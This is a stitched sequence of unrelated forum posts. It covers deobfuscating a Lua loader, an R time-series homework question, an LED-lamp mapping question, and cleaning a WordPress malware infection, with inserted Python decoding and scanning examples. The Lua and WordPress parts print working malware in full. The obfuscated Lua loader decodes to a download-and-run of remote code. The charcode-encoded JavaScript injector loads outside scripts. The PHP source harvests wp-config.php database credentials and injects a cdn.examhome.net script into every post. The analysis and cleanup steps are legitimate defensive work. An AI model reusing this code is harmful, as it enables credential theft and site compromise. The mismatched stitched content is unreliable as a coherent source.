How can I decrypt this new Lua encryption method?
key=[[BREW STORE]];dmnpxzbtpptkabbbstzuaaiyxqbgfszjdhxuxcztvmrghjbawfatwzqandrzrfqlragsyqggkpbvtqktxbckpewunqnfosobaogiitkfsbzuihgljnzslgtmjmgkdasx='om jangan decrypt aku :((';awzmplriqloyociafdhovyenmbcbhqmyegwedddczphgbvubquftewkdqtypcsxmsxihkcwajhqqwidoleeudnahsscjbmlkaocozlvxsbnjbyphljxkcavllyevkhii='Obfuscator Ini Milik ZiGB';jknofzqxfwhpgpwunwnntdqilsqedpbwajyxnzgqchnbspvvehqoyvqdsavrovwklpgfbzpyiorpggadtdjbworigkbdnkbsspfsobalqavigtcfwehcreyeftezpkdi='Kamu Nyari Load?';rzoekzjkzzarhiovruxttaybxqpnhiobpvhbcywmhqlcfoltkbktsjwkldwgobariqrhmimxrmmlbrwhpvurflbcgjonrjvfuappyjeqpmdjghdviciyqkrfpnburddu='Saya Tak Ragu Ingin Nembak Gay People';yazmbcaksoywojorasrbfjqppsgyjdqlzwulsjbfyjxnvxebwmmdxqwkqmhepswuioueybvygkqgijdkrfwmlswajeadgafqggjcdafxxqfgvcmcuennmaesreozhlbn="Soeharto is first indonesian president. Jokowi is seventh indonesian's president, Itadori Yuuji is one of main character in Jujutsu Kaisen Anime, Kento Nanami is Side Character On Jujutsu Kaisen Anime. Lava is 1 of the most dangerous liquid in the world (cap)";mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju={ 
1,160,3,187,236,277,257,244,160,185,307,173,170,186,170,164,168,168,280,246,160,160,160,160,160,160,160,160,160,160,160,200,279,224,161,392,224,227,218,252,260,265,275,259,271,274,260,205,258,271,276,205,268,277,257,205,271,258,262,277,275,259,257,276,271,274,252,260,265,275,259,271,274,260,205,258,271,276,205,268,277,257,205,271,258,262,277,275,259,257,276,271,274,252,260,265,275,259,271,274,260,205,258,271,276,205,268,277,257,205,271,258,262,277,275,259,257,276,271,274,252,271,258,262,277,275,259,257,276,261,260,252,261,270,259,206,268,277,257,293,296,160,160,215,161,337,171,160,160,160,299,160,160,161,171,161,160,162,174,161,162,163,299,161,160,164,302,161,163,165,179,162,160,320,242,160,160,160,289,290,213,288,161,163,215,288,289,163,208,288,161,292,209,288,289,292,179,288,161,293,216,288,289,165,210,288,161,166,216,288,289,166,218,288,161,167,210,288,289,167,217,288,161,296,217,288,289,296,175,288,161,297,179,288,289,297,176,288,161,170,195,288,289,170,194,288,161,299,201,288,289,299,176,288,161,300,181,288,289,300,175,288,161,301,176,288,289,301,211,288,161,302,217,288,289,302,217,288,161,303,215,288,289,175,217,288,161,304,188,288,289,176,183,288,161,177,183,288,289,177,211,288,161,178,212,288,289,178,217,288,161,307,217,288,289,307,182,288,161,180,211,288,289,180,212,288,161,309,217,288,289,309,211,288,161,182,218,288,289,310,208,288,161,183,218,288,289,183,217,288,161,184,210,288,289,312,216,288,161,185,209,288,289,185,215,288,161,314,214,288,289,314,217,288,161,187,210,288,238,162,210,160,289,290,214,288,161,291,217,288,289,291,182,288,161,164,209,288,289,164,215,288,161,165,214,288,289,165,183,288,161,294,208,288,289,294,216,288,161,167,210,288,289,167,219,288,161,296,209,288,289,168,210,288,161,297,216,288,289,169,217,288,161,170,183,288,289,170,210,288,161,171,188,288,289,171,209,288,161,300,186,288,289,172,208,288,161,301,209,288,289,301,187,288,161,302,186,288,289,174,208,288,161,303,209,288,289,175,184,288,161,304,185,288,289,304,187,288,161,177,208,
288,289,177,185,288,161,306,208,288,289,178,210,288,161,307,186,288,289,179,188,288,161,180,208,288,289,180,208,288,161,309,208,288,289,181,184,288,161,310,210,288,289,182,185,288,161,311,209,288,289,183,186,288,161,184,210,288,289,184,208,288,161,185,210,288,289,185,209,288,161,186,188,288,289,186,183,288,161,315,216,288,238,162,210,210,289,162,208,288,161,163,219,288,289,163,183,288,161,164,210,288,289,292,184,288,161,293,183,288,289,165,184,288,161,294,185,288,289,294,187,288,161,295,186,288,289,295,187,288,161,168,187,288,289,168,186,288,161,169,185,288,289,297,185,288,161,170,186,288,289,298,209,288,161,171,185,288,289,299,185,288,161,172,186,288,289,300,186,288,161,301,185,288,289,301,184,288,161,302,210,288,289,174,185,288,161,303,185,288,289,175,186,288,161,304,209,288,289,176,187,288,161,305,184,288,289,177,209,288,161,306,210,288,289,306,184,288,161,307,185,288,289,307,185,288,161,308,187,288,289,308,183,288,161,309,184,288,289,181,188,288,161,310,185,288,289,182,187,288,161,311,184,288,289,183,185,288,161,184,183,288,289,312,193,288,161,313,194,288,289,313,208,288,161,314,216,288,289,186,210,288,161,187,219,288,238,162,210,260,289,290,182,288,161,291,213,288,289,163,218,288,161,164,208,288,289,292,176,288,161,165,180,288,289,165,180,288,161,294,175,288,289,294,179,288,161,167,180,288,238,162,170,310,356,161,162,160,228,161,160,160,356,160,160,160,228,160,160,161,231,160,161,160,294,164,294,272,259,257,268,268,164,293,268,271,257,260,164,295,275,276,274,265,270,263,164,293,259,264,257,274,164,294,276,257,258,268,261,164,295,277,270,272,257,259,267,289,160,160,160,288,161,337,162,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,
160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,288,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,161,289,409,295,288,289,293,255,229,238,246};local nau = 'load'; function krcqzqcsngsbnxfkqsexgiuiqovaprtpzaheaskjzihhbncooqhmmlelpomnwnisnezltuxbtjyxjyoxizmjsgskspqfmzbtiyhiycxvrhgocdbhopcpekzxeyhjezko(...) local nixjoqhhjhbsuoohwhndfbuhzocmgjsmsswezvusnsdjzduytllzolcmlazofnocmrgusjvxitzeahishdtuqxmrfktidtfgezalcbmmfqgjniyqfmgbifvcntkhkzpm='';for hjkvtiyybvwvdxzbaltomtvihqfwcgxqjzsjowtthjlvqhgusuqokkipovcdptyjrhqynclxozdzicxtieoetduxrjtelnxpwpipzwduyoiyikjaxiyltvhxkotryzdb=1, #mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju do if hjkvtiyybvwvdxzbaltomtvihqfwcgxqjzsjowtthjlvqhgusuqokkipovcdptyjrhqynclxozdzicxtieoetduxrjtelnxpwpipzwduyoiyikjaxiyltvhxkotryzdb>3 then nixjoqhhjhbsuoohwhndfbuhzocmgjsmsswezvusnsdjzduytllzolcmlazofnocmrgusjvxitzeahishdtuqxmrfktidtfgezalcbmmfqgjniyqfmgbifvcntkhkzpm=nixjoqhhjhbsuoohwhndfbuhzocmgjsmsswezvusnsdjzduytllzolcmlazofnocmrgusjvxitzeahishdtuqxmrfktidtfgezalcbmmfqgjniyqfmgbifvcntkhkzpm.._ENV['\115\116\114\105\110\103']['\99\104\97\114']((mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju[hjkvtiyybvwvdxzbaltomtvihqfwcgxqjzsjowtthjlvqhgusuqokkipovcdptyjrhqynclxozdzicxtieoetduxrjtelnxpwpipzwduyoiyikjaxiyltvhxkotryzdb]-mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju[2]));end end;local tolan = 
'loadstring';_ENV[_ENV['\115\116\114\105\110\103']['\99\104\97\114'](awzmplriqloyociafdhovyenmbcbhqmyegwedddczphgbvubquftewkdqtypcsxmsxihkcwajhqqwidoleeudnahsscjbmlkaocozlvxsbnjbyphljxkcavllyevkhii:lower():sub(18,18):byte(),dmnpxzbtpptkabbbstzuaaiyxqbgfszjdhxuxcztvmrghjbawfatwzqandrzrfqlragsyqggkpbvtqktxbckpewunqnfosobaogiitkfsbzuihgljnzslgtmjmgkdasx:lower():sub(1,1):byte(),rzoekzjkzzarhiovruxttaybxqpnhiobpvhbcywmhqlcfoltkbktsjwkldwgobariqrhmimxrmmlbrwhpvurflbcgjonrjvfuappyjeqpmdjghdviciyqkrfpnburddu:lower():sub(-9,-9):byte(),yazmbcaksoywojorasrbfjqppsgyjdqlzwulsjbfyjxnvxebwmmdxqwkqmhepswuioueybvygkqgijdkrfwmlswajeadgafqggjcdafxxqfgvcmcuennmaesreozhlbn:lower():sub(21,21):byte())](nixjoqhhjhbsuoohwhndfbuhzocmgjsmsswezvusnsdjzduytllzolcmlazofnocmrgusjvxitzeahishdtuqxmrfktidtfgezalcbmmfqgjniyqfmgbifvcntkhkzpm)(); end;krcqzqcsngsbnxfkqsexgiuiqovaprtpzaheaskjzihhbncooqhmmlelpomnwnisnezltuxbtjyxjyoxizmjsgskspqfmzbtiyhiycxvrhgocdbhopcpekzxeyhjezko(mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju);
I tried many methods. But I don't think I'm experienced enough. The result was negative.
1. Add proper linebreaks
2. Replace insane variable names with shorter ones
3. Unescape things like '\115\116\114\105\110\103' into 'string'
4. Keep going until you realize the thing that starts with _ENV[_ENV[ ends up becoming just load (by the way, nau and tolan are unused decoys)
5. Notice that it's a very simple decryption function that operates on the giant table of numbers and then loads the result
6. Modify the decryption function to print the result instead of loading it
7. Notice the result of doing so is Lua 5.4 bytecode
8. Run unluac on said bytecode
If you're following along, you'll have gotten this out of unluac (newlines elided for brevity):
pcall(load(string.char(table.unpack({ 108, 111, 97, 100, 40, 114, 101, 113, 117, 101, 115, 116, 32, 40, 34, 71, 69, 84, 34, 44, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 103, 105, 115, 116, 46, 103, 105, 116, 104, 117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 98, 114, 101, 119, 100, 101, 114, 115, 47, 101, 57, 99, 54, 97, 100, 56, 54, 97, 100, 49, 52, 56, 97, 51, 98, 101, 54, 57, 97, 97, 98, 49, 102, 51, 100, 53, 101, 97, 101, 99, 57, 47, 114, 97, 119, 47, 101, 50, 48, 49, 52, 56, 54, 56, 55, 53, 51, 52, 53, 100, 51, 52, 53, 54, 52, 50, 102, 51, 52, 53, 100, 55, 50, 99, 102, 50, 52, 52, 56, 48, 50, 57, 52, 55, 50, 51, 47, 68, 70, 98, 114, 101, 119, 46, 108, 117, 97, 34, 41, 41, 32, 40, 41}))))
Now reverse the string.char and table.unpack to see what it's really doing:
load(request ("GET", "https://gist.githubusercontent.com/brewders/e9c6ad86ad148a3be69aab1f3d5eaec9/raw/e201486875345d345642f345d72cf24480294723/DFbrew.lua")) ()
So https://gist.githubusercontent.com/brewders/e9c6ad86ad148a3be69aab1f3d5eaec9/raw/e201486875345d345642f345d72cf24480294723/DFbrew.lua (prettier at https://gist.github.com/brewders/e9c6ad86ad148a3be69aab1f3d5eaec9#file-dfbrew-lua) has what it's really doing, and it's finally not obfuscated at all. (The sha256 was 7de86710d2e66b6ef3b7e1a772d8d80c550b7a309925320e3296ffd333988e6d at the time of writing this answer; some archives/mirrors: 1 2 3 4)
And if you're wondering how this obfuscation happened, this string is present in the bytecode, which should give you a hint: C:\discord-bot-lua-obfuscator\discord-bot-lua-obfuscator\discord-bot-lua-obfuscator\obfuscated\enc.lua
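The decode step from the answer above, as an added example that is not part of the original answer: a static Python decoder that mirrors the Lua loop (each entry after the third, minus entry 2) without ever calling load. The 20 values are the first entries of the table in the question; the function names are this example's own, and it goes one step further than the answer by parsing the Lua 5.4 chunk header to confirm what the decoded bytes are.

```python
"""Statically decode the number-table wrapper from the question (no load())."""

# First 20 entries of the question's table, copied from the page (truncated).
TABLE_PREFIX = [1, 160, 3, 187, 236, 277, 257, 244, 160, 185,
                307, 173, 170, 186, 170, 164, 168, 168, 280, 246]

LUA_SIGNATURE = b"\x1bLua"
LUAC_DATA = b"\x19\x93\r\n\x1a\n"  # fixed check bytes in a Lua 5.4 header


def decode_table(values):
    """Mirror the Lua loop: for i > 3, emit char(t[i] - t[2]) (1-based)."""
    if len(values) < 4:
        raise ValueError("table too short to hold a key and a payload")
    key = values[1]  # Lua t[2]
    out = bytearray()
    for pos, value in enumerate(values[3:], start=4):  # Lua indices 4..#t
        byte = value - key
        if not 0 <= byte <= 255:
            raise ValueError(f"entry {pos} decodes to {byte}, not a byte")
        out.append(byte)
    return bytes(out)


def describe_payload(blob):
    """Classify decoded bytes by inspecting them; nothing is executed."""
    if not blob.startswith(LUA_SIGNATURE):
        # Plain source or another wrapper layer: report it for manual review.
        return {"kind": "not-bytecode", "preview": blob[:40]}
    if len(blob) < 6:
        return {"kind": "lua-bytecode", "truncated": True}
    version = blob[4]  # high nibble = major, low nibble = minor
    info = {
        "kind": "lua-bytecode",
        "version": f"{version >> 4}.{version & 0xF}",
        "format": blob[5],  # 0 = official format
    }
    if version == 0x54 and len(blob) >= 15:
        # Lua 5.4 layout: check bytes, then three type sizes.
        info["check_bytes_ok"] = blob[6:12] == LUAC_DATA
        info["sizes"] = {
            "Instruction": blob[12],
            "lua_Integer": blob[13],
            "lua_Number": blob[14],
        }
    return info


if __name__ == "__main__":
    print(describe_payload(decode_table(TABLE_PREFIX)))
```

Run over the full table and written to a file in binary mode, the decoded bytes are the input the answer hands to unluac.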
Part 2 Boston
plot(boston, ylab=" Boston crime data", xlab= "Time")
#Time series seem to have homogeneous variance upon visual inspection
#Q2
#Trend looks linear in the plot, so for trend differencing operator take d=1
newboston= as.numeric(unlist(boston))
xdiff = diff(newboston)
plot(xdiff)
#Q3
#ADF
library(tseries)
adf.test(xdiff)
#From the result, alternative hypothesis is stationary so null hypothesis is rejected
#KPSS test
install.packages('fpp3', dependencies = TRUE)
library ( fpp3 )
unitroot_kpss(xdiff)
#the p-value is >0.05, so fail to reject null hypothesis for KPSS
#Q4
library(astsa)
acf2(xdiff, max.lag = 50)
model1 = sarima(xdiff, p, 1, q)
So this is what I have tried so far. I am quite new to R, so do be kind if my workings make little sense. For context, Boston is the data I imported from an Excel file, which is simply a column of x axis data.
Firstly, I am trying to do Q4, but I am not sure how I would go about finding p and q.
Second, I am unsure whether what I did in Q2 to detrend my data is correct in the first place.
Here is the output of dput(boston)
dput(boston)
structure(list(x = c(41, 39, 50, 40, 43, 38, 44, 35, 39, 35,
29, 49, 50, 59, 63, 32, 39, 47, 53, 60, 57, 52, 70, 90, 74, 62,
55, 84, 94, 70, 108, 139, 120, 97, 126, 149, 158, 124, 140, 109,
114, 77, 120, 133, 110, 92, 97, 78, 99, 107, 112, 90, 98, 125,
155, 190, 236, 189, 174, 178, 136, 161, 171, 149, 184, 155, 276,
224, 213, 279, 268, 287, 238, 213, 257, 293, 212, 246, 353, 339,
308, 247, 257, 322, 298, 273, 312, 249, 286, 279, 309, 401, 309,
328, 353, 354, 327, 324, 285, 243, 241, 287, 355, 460, 364, 487,
452, 391, 500, 451, 375, 372, 302, 316, 398, 394, 431, 431),
y = c(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45,
46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60,
61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75,
76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90,
91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104,
105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116,
117, 118)), class = c("tbl_df", "tbl", "data.frame"), row.names = c(NA,
-118L))
I built this LED lamp project where I put 126 ping pong balls with WS2812B LEDs inside, into a glass vase.
I had no previous knowledge of FastLED prior to this.
The balls are all jumbled up and leds are in no apparent sequence any longer.
In the code I created a 3d array where I assigned each led a position in the matrix by taping a grid on the outside of the vase and selecting each led with a built in potentiometer and reading the led number from the serial monitor.
So I now have this 3D array:
int led_zyx[3][7][13] =
{
{ {92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92},
{92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92},
{78, 78, 78, 78, 78, 78, 78, 78, 78, 78, 78, 78, 78},
{65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65},
{40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40, 40},
{24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24},
{1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1}
},
{
{124, 124, 124, 124, 110, 119, 119, 116, 116, 108, 108, 108, 117},
{92, 89, 89, 107, 104, 104, 110, 116, 105, 108, 108, 106, 106},
{85, 84, 84, 77, 98, 82, 97, 97, 75, 92, 91, 85, 85},
{34, 73, 73, 60, 60, 82, 65, 65, 45, 62, 72, 34, 34},
{38, 32, 50, 46, 47, 40, 51, 40, 29, 29, 38, 38, 38},
{0, 17, 17, 46, 25, 25, 31, 31, 10, 29, 23, 23, 23},
{2, 2, 0, 0, 0, 1, 1, 0, 0, 10, 2, 2, 2}
},
{
{113, 118, 114, 109, 125, 115, 121, 120, 120, 123, 112, 112, 117},
{95, 89, 103, 83, 83, 99, 100, 122, 111, 101, 96, 106, 102},
{84, 94, 81, 80, 83, 88, 79, 70, 87, 86, 96, 90, 93},
{74, 67, 55, 68, 76, 56, 69, 57, 61, 71, 58, 63, 74},
{54, 49, 26, 37, 42, 41, 36, 43, 52, 44, 33, 59, 66},
{18, 19, 13, 20, 25, 25, 21, 30, 22, 35, 39, 33, 27},
{14, 8, 3, 9, 4, 4, 12, 16, 5, 11, 15, 28, 7}
},
};
So I already managed to create all kinds of cool modes like that, except for using the outside of the lamp/vase as an XY matrix to draw animations on it. It would be a comfortable 13x7 pixels to play around with, but I can't quite figure out how to address it properly to display graphics, text or pixel animations.
Could anyone give me a pointer how to approach this?
I looked into XYmatrix and SmartMatrix, but they require the LEDs to be laid out in a specific order, not in the random way mine are set up.
Thank you for your help
How to remove virus from WordPress?
<script type="text/javascript" async="" src="https://examhome.net/stat.js?v=1.0.2"></script>
I had the same issue on two of my pages this morning, and after investigating a lot in my files and DB, I found that what the malware did was change my js files, adding an encoded script, and add another script at the end of each post in the wp_posts table in my DB.
I solved the problem with basically two steps:
First: go to your DB (MySQL) with phpMyAdmin or with any client and type:
UPDATE `wp_posts` SET post_content = REPLACE (post_content, "<script src='https://cdn.examhome.net/cdn.js?ver=1.0.5' type='text/javascript'></script>", " ")
What it does is delete all the occurrences of the malware injection in your table.
Note: the "?ver=1.0.5" part of the search can change, check your page code with "Ctrl+U" when it starts to load and before the redirect, search for "cdn.examhome.net" or "ads.voipnewswire.net" or "eval(String.fromCharCode..." and check the source and version of the malware js in order to change it on the db query above.
Second: go to your file manager and compress all your files into a zip or similar. Download the compressed file and extract it on your computer, then use Notepad++ (Sublime Text and others can help, but I recommend Notepad++) and use the advanced search on that directory to replace this in all documents with nothing or a blank space:
this is an image of how the replacement looks on Notepad++ (in Spanish)
eval(String.fromCharCode(118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 
50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59, 32, 125));
Note: the numbers inside can change, but they always start with eval(String.fromCharCode(, and don't worry, none of the core JS of WordPress or plugins uses this, so you can search for any match and copy the numbers inside to complete the replace statement.
Then compress it again, delete all your public_html content, re-upload the compressed file, extract it in the public_html root, and it is done.
With this, everything returned to normal for my two WordPress pages. Hope it can help you. Good luck!
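A version-independent check for the two injection forms described in the answer above, as an added example that is not part of the original answer: it finds eval(String.fromCharCode(...)) in file text, decodes the nested layers without executing anything, and lists script hosts in post content regardless of the "?ver=" value. The samples are constructed and use the placeholder domain example.invalid; all function names are this example's own.

```python
"""Detect and statically decode the injections described in the answer above."""
import re
from urllib.parse import urlparse

# String.fromCharCode(<decimal list>); group 1 is the list.
CHARCODE_CALL = re.compile(r"String\.fromCharCode\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)")
# The marker the answer searches for: eval( wrapping a fromCharCode call.
EVAL_CALL = re.compile(r"eval\(\s*" + CHARCODE_CALL.pattern)
URL = re.compile(r"https?://[^\s'\"<>);]+")
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)
MAX_LAYERS = 5  # stop unwrapping after this many nested layers


def charcodes_to_text(arg_list):
    """Decode '118, 97, 114' the way String.fromCharCode would."""
    return "".join(chr(int(n) & 0xFFFF) for n in arg_list.split(","))


def unwrap(text):
    """Replace nested fromCharCode calls by their text; nothing is executed."""
    layers = 0
    while layers < MAX_LAYERS and CHARCODE_CALL.search(text):
        text = CHARCODE_CALL.sub(lambda m: charcodes_to_text(m.group(1)), text)
        layers += 1
    return text, layers


def scan_js(name, text):
    """Return one finding per eval(String.fromCharCode(...)) in a file's text."""
    findings = []
    for m in EVAL_CALL.finditer(text):
        decoded, inner_layers = unwrap(charcodes_to_text(m.group(1)))
        findings.append({
            "file": name,
            "offset": m.start(),
            "layers": inner_layers + 1,
            "urls": sorted(set(URL.findall(decoded))),
        })
    return findings


def foreign_script_hosts(html, own_hosts):
    """Hosts of <script src=...> tags in post content that are not the site's own.

    Matching on the host ignores the '?ver=' value, which the answer notes changes.
    """
    hosts = set()
    for src in SCRIPT_SRC.findall(html):
        host = urlparse(src).hostname  # None for relative paths
        if host and host.lower() not in own_hosts:
            hosts.add(host.lower())
    return sorted(hosts)


def sample_codes(s):
    """Helper used only to build the constructed sample below."""
    return ", ".join(str(ord(c)) for c in s)


# Constructed samples (placeholder domain), shaped like the page's payloads.
SAMPLE_INNER = ("var elem = document.createElement('script'); "
                "elem.src = String.fromCharCode(%s);"
                % sample_codes("https://ads.example.invalid/ad.js"))
SAMPLE_JS = ("jQuery(function(){});\neval(String.fromCharCode(%s));"
             % sample_codes(SAMPLE_INNER))
SAMPLE_POST = ("<p>Hello</p><script src='https://cdn.example.invalid/cdn.js"
               "?ver=1.0.88' type='text/javascript'></script>")

if __name__ == "__main__":
    print(scan_js("sample.js", SAMPLE_JS))
    print(foreign_script_hosts(SAMPLE_POST, {"blog.example.invalid"}))
```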
You should check your theme's wp-content/themes/{your-active-theme-name}/functions.php file to see if anything malicious was added.
You can also look at VaultPress, offered by the creators of WordPress. Run a scan with it and see what it finds.
https://vaultpress.com/
I helped a friend with this issue and decided to help the community with the experience I had in solving this nasty malware in WordPress files. I discovered that the malware was being injected into one of the folders, in my case the /wp-content/uploads/ folder, as a file with no extension.
I discovered two files (PHP files):
The first file exposes the "wp-config.php" with all the keys and DB details and injects the examhome.net script into the post_content table; the code is below.
<?php echo ":#009009#:";
$file_to_search = "wp-config.php";
#search_file($_SERVER['DOCUMENT_ROOT']."/../../../../..",$file_to_search);
#search_file($_SERVER['DOCUMENT_ROOT']."/../../../..",$file_to_search);
#search_file($_SERVER['DOCUMENT_ROOT']."/../../..",$file_to_search);
#search_file($_SERVER['DOCUMENT_ROOT']."/../..",$file_to_search);
#search_file($_SERVER['DOCUMENT_ROOT']."/..",$file_to_search);
#search_file($_SERVER['DOCUMENT_ROOT'],$file_to_search);
function search_file($dir,$file_to_search){
$files = scandir($dir);
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);
if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false) {
show_sitenames($path);
}
} else if($value != "." && $value != "..") {
search_file($path, $file_to_search);
}
}
}
echo ":#009009#:";
function show_sitenames($file){
$content = #file_get_contents($file);
if(strpos($content, "DB_NAME") !== false) {
$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);
// Create connection
$conn = new mysqli($host, $user, $pass);
// Check connection
if ($conn->connect_error) {
echo $conn->connect_error;
} else {
$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
$result = $conn->query($q);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 ";
$result2 = $conn->query($q2);
if ($result2->num_rows > 0) {
while($row2 = $result2->fetch_assoc()) {
$val = $row2['post_content'];
if(strpos($val, "examhome") === false){
echo "nothing:".$file."\n";
$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://cdn.examhome.net/cdn.js?ver=1.0.88' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%examhome%'";
$conn->query($q3);
} else {
echo "already exist:".$file."\n";
}
}
} else {
}
}
} else {
}
$conn->close();
}
}
}
function get_var_reg($pat,$text) {
if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
{
return $matches[1][0];
}
return "";
}
exit();
And the second file, when executed, injects the code below (JS script) into the js files recursively into the "" section everywhere.
The script also changes the permissions of the files to 777, meaning read and write.
At this stage your system is already compromised, and it doesn't matter how many times you remove the script from the files: they have full access to the system because of the "wp-config.php" details that were compromised earlier, meaning that they can now access your wp-admin.
